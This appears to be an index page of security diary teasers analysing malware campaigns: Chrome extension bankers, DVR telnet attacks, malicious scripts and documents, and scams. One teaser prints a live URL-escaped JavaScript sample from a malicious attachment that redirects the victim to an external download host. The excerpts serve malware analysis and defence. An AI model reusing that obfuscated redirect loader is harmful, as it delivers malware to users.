Author: nate

Introduction It seems that Google Chrome extensions have become quite the tool for banking malware fraudsters. Two weeks ago, an offender phoned a victim and asked him to install a supposedly new bank security module that, instead, was a malicious extension hosted at the Google Chrome app store aimed to steal victim’s banking credentials [1]. …

Read more “Second Google Chrome Extension Banker Malware in Two Weeks, (Tue, Aug 29th)”

Last week, the fact that someone leaked 1700 or so IP addresses with default username/password caused some people to get excited about the issue of default telnet credentials again. Ever since the “Mirai” outbreak, we do see a pretty constant stream of requests for port 23 (and to some extent 2323 as well as 22) …

Read more “An Update On DVR Malware: A DVR Torture Chamber, (Mon, Aug 28th)”

Reader Chris submitted a suspicious attachment. It is a 7-Zip file. As you probably know, I like to do static analysis without extracting malware to disk, but by piping it into a chain of tools. This can be done with 7-Zip too. Here is the content of the file: It contains a single VBScript file: …

Read more “Malware analysis: searching for dots, (Sat, Aug 26th)”

Here is another sample that hit my curiosity. As usual, the infection vector was an email which delivered some HTML code in an attached file called “PO_5634_780.docx.html” (SHA1:d2158494e1b9e0bd85e56e431cbbbba465064f5a). It has a very low VT score (3/56)[1] and contains a simple escaped Javascript code: document.write(unescape(‘%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D %22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%20%0A%75%72%6C%3D%68%74%74%70%73%3A%2F%2F%31%66%69%63%68%69%65 %72%2E%63%6F%6D%2F%3F%64%6A%39%38%66%66%35%36%68%32%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61 %72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A %3C%2F%53%63%72%69%70%74%3E’)) Here is the decoded version: It downloads …

Read more “Malicious AutoIT script delivered in a self-extracting RAR file, (Fri, Aug 25th)”

Since the invention of the Internet (or e-mail) we have been seeing various scams that try to entice the user to transfer his hard-earned money to a scammer’s account. There are many, many forms of the old fashioned advance-fee (419) scam where the victim is usually asked to transfer money to attacker’s account for whatever …

Read more “Free Bitcoins? Why not?, (Thu, Aug 24th)”

Yesterday, I found an interesting sample that I started to analyze… It reached my spam trap attached to an email in Portuguese with the subject: “Venho por meio desta solicitar orçamento dos produtos” (“I hereby request the products budget”). There was one attached ZIP archive: PanilhaOrcamento.zip (SHA1: 3c159f65ba88bb208df30822d2a88b6531e4d0a7) with a VT score of 0/58[1]. Inside …

Read more “Malicious script dropping an executable signed by Avast?, (Wed, Aug 23rd)”

Today, I would like to promote a best practice via a small Python module that is very helpful when you’re dealing with suspicious or malicious URLs. Links in documents are potentially dangerous because users can always click by mistake on them. Many automated tools and scripts are processing documents to fetch links. Even if the …

Read more “Defang all the things!, (Tue, Aug 22nd)”

Jeff received an invoice via email, did not trust it and submitted it to us. As expected, it was not an invoice, but a malicious Word document (MD5 9c4c3234f20b6102569216675b48c70a). I do a step by step analysis in this diary entry, but you can also watch a video of the analysis: [youtube https://www.youtube.com/watch?v=FRYYoixq_EY&w=560&h=315] Let’s take a …

Read more “It's Not An Invoice …, (Sun, Aug 20th)”

There is nothing new about Wireshark releasing an update; however, the new 2.4 branch has new feature that is quite useful that I have been waiting to be able to use for a while. In case you missed it, tshark now has the ability to Export Objects. I have tested the export using large pcap files with multiple objects …

Read more “tshark 2.4 New Feature – Command Line Export Objects, (Fri, Aug 18th)”

1. Introduction After receiving quite a big amount of malspam with similar messages in my honeypots this week, I decided to dedicate some time to analyze what it was about. To my surprise, after peeling multiple encoding layers protecting the malware’s core (felt like peeling an onion), I could finally find a sophisticated and well …

Read more “EngineBox Malware Supports 10+ Brazilian Banks, (Fri, Aug 18th)”